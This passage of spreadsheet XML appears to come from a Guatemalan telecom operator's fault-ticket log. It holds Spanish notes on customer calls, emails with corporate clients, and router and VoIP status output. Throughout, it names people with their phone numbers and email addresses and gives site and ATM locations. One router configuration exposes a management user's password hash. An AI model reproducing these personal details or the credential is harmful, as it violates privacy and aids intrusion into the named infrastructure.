DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.31.145.10
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.31.145.8/30  DIRECT  0    0             D   10.31.145.9     VLANIF402			</t>
  </si>
  <si>
    <t>F4624951</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER MEJIA 77874053 PARA BRINDAR RETROALIMENTACION, MENCIONA QUE EL DIA DE HOY COMO A LAS 7:30 SE PRESENTO PERSONAL TECNICO Y REALIZO VALIDACIONES DE LOS EQUIPOS CONFIRMANDOLE AL CLIENTE QUE SE TENIA UN CORTE DE FO
-ID 3001847307</t>
  </si>
  <si>
    <t>SE ENVÍA CORREO A CLIENTE SOLICITÁNDOLE APOYO CON TELS DE PR PARA CONTINUAR CON EL SEGUIMIENTO DEL TICKET, EN ESPERA DE RESPUESTA DE ÉSTE:
ASUNTO: RE: SOLICITUD DE SOPORTE :: || CNOC TICKET IMLPS006442 || ID LOCAL IDG000212 || ENLACE CAÍDO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 QUIEN BRINDA EL CONTACTO DE CLIENTE
LEILA AIDE RIVAS TORRES - 503 22438144 - 22438171
-ID 3001773498</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTA LA SEÑORITA KARINA RUIZ QUIEN INDICA QUE AUN NO TIENEN INFORMACION DE ALGUN CONTACTO EN SITIO **
-ID 3001699808
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 NO RESPONDEN DEJAN EN ESPERA Y NO RETOMAN LLAMADA || SE INTENTARA LUEGO, AUN SIN RESPUESTA DE CORREO  **
-ID 3001667293
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 NO RESPONDEN DEJAN EN ESPERA MAS DE 4 MIN Y NO RETOMAN LLAMADA || SE INTENTARA LUEGO, AUN SIN RESPUESTA DE CORREO  **
-ID 3001671076
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LEILA AIDE RIVAS TORRES - 503 22438144 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 3001774509</t>
  </si>
  <si>
    <t>F4625072</t>
  </si>
  <si>
    <t>SE TIENE EN LINEA A ARMANDO CASTELAN 58349836, CLIENTE SE DIRIGE A DONDE ESTÁN SUS EQUIPOS</t>
  </si>
  <si>
    <t>CON APOYO DE JOSUE SIAM Y FRANCISCO RIVERA SE VERIFICA CONFIGURACIÓN DEL AETHRA 6044 Y REGISTRO EN CENTRAL. SE VERIFICA QUE EL EQUIPO YA SE ESTÁ REGISTRANDO, SE TIENEN LLAMADAS EN CURSO, CLIENTE ARMANDO CASTELAN VALIDA QUE YA TIENE LLAMADAS, SE VALIDARÁ A LAS 15 HORAS.
PROTUNAC20_90001900829\VOIP&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        75       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        29       30
CURRENT TRUNK SIP CONNECTIONS = 1 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-50278201220       ENABLE   +50278201220                     REGISTERED                              10.16.246.231:5060    1376      02 JUL 2022 09:04:02
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE, USED INTO INBOUNDLIST,OUTBOUNDLIST
B31 STATUS           : OUTGOING REMOTE RINGING, IDLE
DSP RESOURCE         : ALLOCATED
DSP MEDIA            : OPENED
DSP ENCODER          : G.711-ALAW
DSP DECODER          : G.711-ALAW
ECHO CANCELLATION    : ON
SILENCE SUPPRESSION  : OFF
STATUS OF SIP-50278201220
CONFIGURATION STATUS     : ENABLE
CURRENT REGISTRAR HOST   : 10.16.246.231
CURRENT PROXY HOST       : 10.16.246.231
  SECONDARY PROXY HOSTS  : NONE
INTERFACE STATUS         : CLIENTE UP
REGISTRATION STATUS      : REGISTERED (REFRESH TIME = 1376 SEC)
LOGICAL STATUS           : USED INTO INBOUNDLIST,OUTBOUNDLIST
MESSAGE WAITING          : NO
CONNECTIONS:
USERTERM              DIR  REMOTEUSER           CODEC
ISDN-PRI-LINE-1(B31)  TO   30671888             G.711-ALAW
COMMAND EXECUTED</t>
  </si>
  <si>
    <t>INFORMA TEC MELVIN PEREZ 51345928 QUE AL LLEGAR SERVICIO YA ESTÁ RESTABLECIDO, SE VERIFICA EL AETHRA Y SE OBSERVA REGISTRADO. SE REALIZAN PRUEBAS CON CLIENTE ARMANDO CASTELAN Y VALIDA QUE YA TIENEN LLAMADAS ENTRANTES Y SALIENTES. SE CONTINÚA EN PRUEBAS. ID DE LLAMADA: 3001503051</t>
  </si>
  <si>
    <t>-* SE HABLA CON ARMANDO CASTELAN (CLIENTE) INFORMA QUE NUEVAMENTE ESTA FALLANDO EL SERVICIO, SOLICITA HABLAR CON EL GESTOR A CARGO, SE REALIZA CONFERENCIA CON DAVID MONZON (GESTOR) PARA VALIDACIONES Y/O PRUEBAS *
-*</t>
  </si>
  <si>
    <t>CLIENET ARMANDO CASTELAN 58349836 VALIDA QUE EL SERVICIO ESTA FUNCIONANDO BIEN, SOLICITA SE VALIDE A LAS 6 PM
ID DE LLAMADA: 3001538588</t>
  </si>
  <si>
    <t>CLIENTE ARMANDO CASTELAN 58349836 INDICA QUE EL SERVICIO HA ESTADO OPERATIVO Y YA NO PRESENTÓ INCONVENIENTES, AUTORIZA EL CIERRE DEL CASO.
3001682337
COLA:
NOMBRE: A: 58349836
NÚMERO: 58349836
DURACIÓN: 0:00:53
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 58349836
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 04/07/2022 09:11:45 A. M.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ARMANDO CASTELLAN 58349836, SE LE SOLICITA APOYO PARA REINICIAR SU PLANTA PBX, CLIENTE SOLICITA SE LE LLAME EN 20 MINUTOS EN LO QUE LO REINICIA. ID DE LLAMADA: 3001476018</t>
  </si>
  <si>
    <t>F4625076</t>
  </si>
  <si>
    <t>CLIENTE MARGARITA PAZ REALIZA PRUEBAS DE LLAMADAS Y VALIDA EL E1 OPERATIVO, AUTORIZA EL CIERRE DEL CASO
ID: 3001472991</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARGARITA RUIZ 47688328  INDICA QUE NO SE ENCUENTRA EN SUS INSTALACIONES, INDICA QUE AVERIGUARÁ SI HAY ALGUIEN EN EL PR QUE NOS PUEDA APOYAR Y DEVOLVERÁ LA LLAMADA. ID: 3001464408</t>
  </si>
  <si>
    <t>F4625137</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A CAROLINA MEJÍA/EJECUTIVA CLARO; SE LE INFORMA QUE SE CERTIFICARÁ SERVICIO MAÑANA A LAS 07:00AM; ADICIONAL SE ENVÍA CORREO A CLIENTE CON EL LISTADO DEL POSIBLE PERSONAL TÉCNICO QUE ATENDERÁ, SE LE PIDE QUE NOS APOYE AUTORIZANDO EL INGRESO.</t>
  </si>
  <si>
    <t>F4625140</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE AUTORIZANDO EL CIERRE DEL TICKET, SE PROCEDE:
DE: STEVEN MARQUEZ (VENDOR) [MAILTO:STEVEN.MARQUEZ@WALMART.COM]
ENVIADO EL: SÁBADO, 2 DE JULIO DE 2022 15:27
ASUNTO: RE: ENLACE INESTABLE DE DF MAZATENANGO 2 ID: 344400051
BUENAS TARDES,
PROCEDER CON EL CIERRE DEL TICKET.
SLDS;</t>
  </si>
  <si>
    <t>F4625235</t>
  </si>
  <si>
    <t>CLIENTE ALVIN BURROS 33903241 VALIDA QUE YA ESTAN RECIBIENDO LLAMADAS, SOLICITA SE LE LLAME A LAS 13:00 HORAS PARA VALIDAR. ID: 3001500951</t>
  </si>
  <si>
    <t>F4625282</t>
  </si>
  <si>
    <t>SE ENVIA  CORREO PARA APERTURA
RE: ATM 4842
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:MARLON ESTUARDO RAMOS;CLIENTESCORPORATIVOSY 5 MÁS
CC:MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;
SÁB 02/07/2022 14:49
BUENA TARDE ESTIMADO CLIENTE ,  SOLICITAMOS  DE  SU AMABLE APOYO ,PARA APERTURAR CAJERO EL DIA MARTES 05/07/2022 A LAS 10:00
TE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EN ESPERA DE SUS COMENTARIOS</t>
  </si>
  <si>
    <t>F4625374</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A MELVIN SANDOVAL/CLIENTE; SE LE PIDE TEL ADICIONAL DE PR; ME BRINDA EL 35186726 CON VÍCTOR HERNÁNDEZ/PR; SE TIENE EN LÍNEA A ÉSTE, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELÉFONO APOYA DARWIN ESPAÑA/GESTOR N1; EN TRIPARTITA, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4625403</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA  VALIDAR --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 4 DE JULIO DE 2022 04:42
PARA: JUAN ELIAS SIERRA ORTIZ &lt;JUAN.SIERRA@SOMOSCMI.COM&gt;
CC: NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
ASUNTO: RE: FALLA ENLACE GRANJERO 219_629100044T
BUENOS DÍAS ESTIMADO SR. SIERRA.
                PODRÍA APOYARNOS EN VALIDAR EL FUNCIONAMIENTO ACTUAL DEL SERVICIO E INDICARNOS SI PODRÍAMOS CERRAR EL TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4625476</t>
  </si>
  <si>
    <t>**SE LAMA A CLIENTE RICARDO SAHAGUN AL 22436622  NO RESPONDE || ENVIA A BUZON ||SE INTENTARA LUEGO**
-ID 3001670734
**</t>
  </si>
  <si>
    <t>F4625768</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS CACERES 78624589 INDICA QUE NO CUENTA CON ENERGIA E INDICA QUE DURANTE EL DIA O MAÑANA SE RESTABLECERA **
-ID 3001667756
**</t>
  </si>
  <si>
    <t>F4626047</t>
  </si>
  <si>
    <t>SE DAN AVANCES A CLIENTE.
DE: JAIME JOSUE HERNANDEZ CASTILLO
ENVIADO: DOMINGO, 3 DE JULIO DE 2022 10:01
PARA: LUIS OVIDIO NORIEGA LARA; JEFFERSON ARCE (VENDOR); STEVEN MARQUEZ (VENDOR); EDUARDO LUIS PINEDA ZELEDA; SAUL ORELLANA (VENDOR); CNOCCA
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA; GRUPO N1; CORPOWALMART
ASUNTO: RE: ENLACE CAÍDO DE MXM LA GRANJA ID: CONTR0001456960OC
ESTIMADO CLIENTE
   HACEMOS DE SU CONOCIMIENTO QUE EL PERSONAL SE ENCUENTRA A 2 HORAS DE SUS INSTALACIONES.
AGRADECEMOS SU ATENCIÓN.
SALUDOS
ENVIADO DESDE CORREO PARA WINDOWS</t>
  </si>
  <si>
    <t>F4626360</t>
  </si>
  <si>
    <t>CLIENTE INDICA
BUEN DÍA, TENDRÁN INFORMACIÓN DE ESTA SUCURCSAL CC_AZTECA_GT_SUC003237/291900002T?
SERGIO, 09:09
BUEN DÍA FÍJATE QUE ESTAMOS TRATANDO DE COMUNICARNOS A LA SUCURSAL
PARA VALIDAR</t>
  </si>
  <si>
    <t>SE CONSULTA EN GRUPO BANCO AZTECA PROACTIVO, SE QUEDA AL PENIDENTE DE RESPUESTA DEL CLIENTE .</t>
  </si>
  <si>
    <t>F4626409</t>
  </si>
  <si>
    <t>CONTACTO DE TICEKT ANTERIORES VILLATORO 42511712 CLIENTE INDICA QUE PRESENTAN FALLA DE ENERIGA EN PUNTO REMOTO.
3001614199
COLA:
NOMBRE: A: 42151712
NÚMERO: 42151712
DURACIÓN: 0:01:22
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 42151712
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 3/07/2022 12:14:25</t>
  </si>
  <si>
    <t>F4626612</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  YOHANA SANCHEZ 42682402 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 3001683604 - 3001683744</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  YOHANA SANCHEZ 42682402  NO RESPONDE, SE INTENTARA LUEGO
-ID 3001674766</t>
  </si>
  <si>
    <t>F4626613</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA DESCARTAR TEMAS DE ENERGIA O MANTENIMIENTO.
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 3 DE JULIO DE 2022 12:27PARA: ESANCHEZ@CAMPERO.COM &lt;ESANCHEZ@CAMPERO.COM&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; HELPDESK04@CAMPERO.COM &lt;HELPDESK04@CAMPERO.COM&gt;; HELPDESK@CAMPERO.COM &lt;HELPDESK@CAMPERO.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_CAMPERO_GT_C15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6613
ID: 625900201T
IDENTIFICADOR DEL CLIENTE:  CC_CAMPERO_GT_C159
UBICADO EN:  159, BOULEVARD HACIA EL CENTRO MÉDICO MILITAR 13-75 ZONA 16
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4626625</t>
  </si>
  <si>
    <t>PROBABLE FALLA DE ENERGIA ELECTRICA EN PUNTO REMOTO. SE LLAMA A CLIENTE NO SE OBTIENE RESPUESTA, SE LLAMARA EN OTRO MOMENTO
3001615014
COLA:
NOMBRE: A: 46270629
NÚMERO: 55280199
DURACIÓN: 0:00:42
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 3/07/2022 12:22:08</t>
  </si>
  <si>
    <t>F4626646</t>
  </si>
  <si>
    <t>WALTER AROCHE (CLIENTE) SE LE INFORMA SOBRE FALLA GENERAL, AVANCES EN 1-1.5 HRS
**  SE HABLA CON BRYAN  (CCR GT) INFORMA QUE AUN NO SE TIENE RESPUESTA DE LOS TECNICOS Y SI NO ES POSIBLE TRABAJAR HOY SERÍA EL DÍA DE MAÑANA, ESTARÁN ACTUALIZANDO LA FALLA GENERAL AL TENER AVANCES -*
*-</t>
  </si>
  <si>
    <t>F4626682</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DE TECNICO  EDGAR GOMEZ 58261144 INDICANDO QUE EN SITIO REMOTO NO LE PERMITIERON EL ACCESO YA UE ES NECESARIO GESTIONAR ACCESOS CON LA CENTRAL, SE LLAMA A CLIENTE EN PR OSCAR SALGUERO 54748575 QUIEN INDICA QUE ES NECESARIO ENVIAR EL CORREO PARA LA GESTION DE LOS PERMISOS
3001639805
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 54605044
NÚMERO: 54605044
DURACIÓN: 0:08:40
ESTADO: ACD - ASIGNADO A: ERITO.TECU
DETALLES: 54605044
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 3/07/2022 15:58:31
3001639973
COLA:
NOMBRE: A: 54748575
NÚMERO: 54748575
DURACIÓN: 0:05:36
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 54748575
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 3/07/2022 15:57:23</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO SOLICITANDO ACCESOS PARA EL PERSONAL TECNICO, PENDIENTE CONFIRMEN ||
ASUNTO: SOLICITUD DE ACCESOS 354300027T || JANAMA S.A. || INTERNET.- AV PETAPA 51-57 C.C. PLAZA ATANASIO TZUL LOCAL 28
ERITO FERNANDO TECU XITUMUL
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO 354300027T || JANAMA S.A. ||  INTERNET.- AV PETAPA 51-57 C.C. PLAZA ATANASIO TZUL LOCAL 28. SOLICITAMOS NOS PUEDA APOYAR EN GESTIONAR LOS ACCESOS PARA NUESTRO PERSONAL TÉCNICO QUE ESTARÁ ATENDIENDO LA VISITA A LA SUCURSAL, YA QUE EL DÍA DE HOY LLEGARON Y NO LE PERMITIERON INGRESO INDICANDO QUE ES NECESARIO ENVIAR LOS DATOS DEL PERSONAL POR CORREO.
ADJUNTO LOS DATOS DEL PERSONAL TÉCNICO ASIGNADO.</t>
  </si>
  <si>
    <t>F4626703</t>
  </si>
  <si>
    <t>SE CONTINUAN TRABAJO HOY A LAS 8:00 POR ACCESOS A SITIO
04/07/2022 04:03:35 GUATEMALA/CENTRO AMERICA (JUAN JOSE AUGUSTO DONIS ROBLES):
SE TIENE PENDIENTE LA CONTINUIDAD DE LOS TRABAJOS POR TEMAS DE ACCESO EL CUAL SE GESTIONARA A PARTIR DE LAS 8:00HRS: "BYRON GASPARICO INDICA QUE SE REALIZARON MEDICIONES Y CONFIRMAN QUE SI LLEGAN AL OTRO EXTREMO PERO ES NECESARIO ENTRAR A SAN ISIDRO PARA PODER REALIZAR MEDCIONES PERO SE NECESTIA UN PERMISO ESPECIAL EL CUAL DEBE SER SOLICITADO POR PARTE DE PLANTA INTERNA EN HORARIO HABIL</t>
  </si>
  <si>
    <t>F4626851</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR JEFERSON ARCE CONFIRMA SERVICIO ESTABLE Y AUTORIZA CIERRE DE TICKET  **
-ID 3001672372
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 NO RESPONDE || SE INTENTARA LUEGO**
-ID 3001668450
**</t>
  </si>
  <si>
    <t>F4626859</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GONZALEZ AL 76971516 INDICA QUE NO SE ENCUENTRA EN SITIO SOLICITA QUE SE LE LLAME NUEVAMENTE A LAS 12:00 HRS **
-ID 3001677055
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LUIS GONZALEZ 76971516 MENCIONA QUE EL INCONVENIENTE ES NO PODER LLEGAR AL ANCHO DE BANDA CONTRATADO
-ID 3001726927</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA SEGUNDA LLAMADA A LAS 16:00 HORAS PARA VALIDAR QUE TODO DEL BW SE ENCUENTRE CORRECTO. SEGUN LO INDICADO VIA LLAMADA EL SERVICIO SE ENCUENTRA RESTABLECIDO Y CON EL BW CORRECTO-
31850297</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GONZALEZ AL 76971516 NO RESPONDE ||ENVIA A BUZON || SE INTENTARA LUEGO**
-ID 3001668847
**</t>
  </si>
  <si>
    <t>F4626897</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE HABLO CON EL CLIENTE DALILA, QUIEN INDICA QUE YA POSEE LLAMADAS.
SOLICITA QUE SE LE LLAME EL DIA DE MAÑANA A LAS  9:00AM PARA VALIDAR
3001657699
COLA:
NOMBRE: A: 79630909
NÚMERO: 79630909
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 79630909
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 3/07/2022 19:29:56
INMOBILIARIA_LOS_ANGELES_90001907295\VOIP&gt;&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        76       76
DSP0                  :         8        8
DSP1 (ISDN-PRI)       :        30       30
CURRENT TRUNK SIP CONNECTIONS = 0 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST     REFRESH   REG.TIME
SIP-INMOBI            ENABLE   +50279630909                     REGISTERED                              10.16.246.199:5060    2441      03 JUL 2022 19:28:18
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE, USED INTO INBOUNDLIST,OUTBOUNDLIST
NO B CHANNELS IN USE.
STATUS OF SIP-INMOBI
CONFIGURATION STATUS     : ENABLE
CURRENT REGISTRAR HOST   : 10.16.246.199
CURRENT PROXY HOST       : 10.16.246.199
  SECONDARY PROXY HOSTS  : NONE
INTERFACE STATUS         : ETH1 UP
REGISTRATION STATUS      : REGISTERED (REFRESH TIME = 2441 SEC)
LOGICAL STATUS           : USED INTO INBOUNDLIST,OUTBOUNDLIST
MESSAGE WAITING          : NO
NO CONNECTIONS
COMMAND EXECUTED
INMOBILIARIA_LOS_ANGELES_90001907295\VOIP&gt;&gt;UP
COMMAND EXECUTED
INMOBILIARIA_LOS_ANGELES_90001907295&gt;&gt;ISDN
INMOBILIARIA_LOS_ANGELES_90001907295\ISDN&gt;&gt;SHOW STATUS -S
STATUS OF ISDN-BRI1 INTERFACE
NOT USED
STATUS OF ISDN-BRI2 INTERFACE
NOT USED
STATUS OF ISDN-BRI3 INTERFACE
NOT USED
STATUS OF ISDN-BRI4 INTERFACE
NOT USED
STATUS OF ISDN-PRI1 INTERFACE
LAYER 1 STATUS = UP
LAYER 1 UP COUNT = 1
LAYER 1 UP TIME = 1H 35M 55S
LAYER 2 STATUS = UP
USED B CHANNELS: NONE
-------------RX----------TX----------
LOS ALARM  : OFF
AIS ALARM  : OFF         OFF
LOF ALARM  : OFF
RAI ALARM  : OFF         OFF
BER ALARM  : OFF
BER (1SEC) : 0.00E+00
LOOP       : OFF         OFF
COMMAND EXECUTED
INMOBILIARIA_LOS_ANGELES_90001907295\ISDN&gt;&gt;UP
COMMAND EXECUTED
INMOBILIARIA_LOS_ANGELES_90001907295&gt;&gt;</t>
  </si>
  <si>
    <t>F4626899</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SALVADOR GUERRA AL 58928393 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001669040
**</t>
  </si>
  <si>
    <t>F4626927</t>
  </si>
  <si>
    <t>***--- SE RECIBE CORREO DE CL Y SE LE RESPONDE --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 4 DE JULIO DE 2022 00:11
PARA: GERALD TORRES (VENDOR) &lt;GERALD.TORRES@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI GUAYABO ID: CONTR00020559833OC
BUENOS DÍAS ESTIMADO SR. TORRES.
                LAMENTAMOS LOS INCONVENIENTES, EL PERSONAL A CARGO ESCALO EL CASO CON EL PROVEEDOR DE ÚLTIMA MILLA.
ESPERAMOS COMPARTIR AVANCES A LA BREVEDAD POSIBLE.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: GERALD TORRES (VENDOR) [MAILTO:GERALD.TORRES@WALMART.COM]
ENVIADO EL: DOMINGO, 3 DE JULIO DE 2022 23:00
PARA: PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE INESTABLE DE PALI GUAYABO ID: CONTR00020559833OC
HOLA PERLA,
TE INDICO QUE ESTA SITUACIÓN ES DE IMPACTO ALTO PARA NUESTRA OPERACIÓN, TENEMOS VARIOS PROCESOS  DETENIDOS,
NECESITO QUE ME BRINDE, ALGUN TIEMPO ESTIMADO DE AVANCE Y LA RESOLUCIÓN DE LA FALLA PORFAVOR,
SLDS!
GT</t>
  </si>
  <si>
    <t>F4626987</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE KELLY LÓPEZ AL 4720-1161 NO RESPONDE ENVIA A BUZON **
-ID 3001824976
**</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A CLIENTE SOLICITÁNDOLE APOYO A AUTORIZAR EL INGRESO DE PERSONAL TÉCNICO ASIGNADO PARA MAÑANA A LAS 10:00AM
ADICIONAL SE HABLÓ CON KELLY LÓPEZ/CLIENTE 4720-1161 INDICA QUE NOS APOYARÁ CONFIRMANDO EL VO.BO. PARA NO TENER ATRASOS EL DÍA DE MAÑANA
ASUNTO: RE: PERDIDA DE VISIBILIDAD DE CÁMARAS</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RENATO MEJIA || 55439036 MENCIONA QUE HOY POR SER FERIADO LAS BODEGAS ESTAN CERRADAS POR LO QUE SOLICITA SE REALICE LA VISITA PARA MAÑANA A LAS 10:00 HRS, SE NOTIFICARA PARA EL SEGUIMIENTO
BODEGA DE CORIZA
-ID 3001718737</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RENATO MEJIA AL PR  5543-9036 NO RESPONDE || ENVIA A BUZON | SE INTENTARA LUEGO**
-ID 3001825762
**</t>
  </si>
  <si>
    <t>F4627035</t>
  </si>
  <si>
    <t xml:space="preserve">SE TUVO ALARMA DE ENERGIA HACE 6 HORAS SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 6 HORAS
UPTIME GENERAL DEL CPE: 6H5M9S
CONFIGURACION DEL CPE:
SHOW ALL-CONFIG
; SHOWING MENU AND SUBMENUS CONFIGURATION FOR ACCESS-LEVEL 15 ...
; RS123W-4G BASE REG_DOMAIN_ROW ROUTER VERSION 11.01.10.00.01
   LOG-COMMAND-ERRORS
   NO CONFIGURATION
   DESCRIPTION "DEFAULT CONFIG: STANDARD"
;
   ADD DEVICE DIRECT-IP 10
   ADD DEVICE TNIP 10
   ADD DEVICE TNIP 20
   ADD DEVICE ETH-SUBINTERFACE ETHERNET0/1 10
   ADD DEVICE LOOPBACK 5
   SET DATA-LINK AT CELLULAR0/0
   SET DATA-LINK AT CELLULAR1/0
   SET DATA-LINK NIC CELLULAR0/1
   SET DATA-LINK NIC CELLULAR0/2
   SET DATA-LINK NIC CELLULAR1/1
   SET DATA-LINK NIC CELLULAR1/2
   SET HOSTNAME CC_TYT_GT_ATM4860
   SET HOST-LOCATION "ATM 4860 KM 70 LOCAL 1, 2 Y 3 MASAGUA ESCUINTLA SUPER 24 MASAGUA"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BANNER LOGIN "----------------------------------------------------------------------"
   BANNER LOGIN "-                            CNOC CLARO                              -"
   BANNER LOGIN "----------------------------------------------------------------------"
   BANNER LOGIN "- ESTE EQUIPO ES PROPIEDAD PRIVADA, SI NO TIENE AUTORIZACION         -"
   BANNER LOGIN "- PARA INGRESAR AL EQUIPO, POR FAVOR CANCELE LA CONEXION             -"
;
   USER GESTIONIP HASH-PASSWORD 09265F35E5E79BC2913779FF24DA92A1
;
   GLOBAL-PROFILES DIAL
; -- DIAL PROFILES CONFIGURATION --
      PROFILE CLARO_TYT DEFAULT
      PROFILE CLARO_TYT DIALOUT
      PROFILE CLARO_TYT 3GPP-APN TYT.CLARO
      PROFILE CLARO_TYT 3GPP-PDP-TYPE IPV4V6
;
   EXIT
;
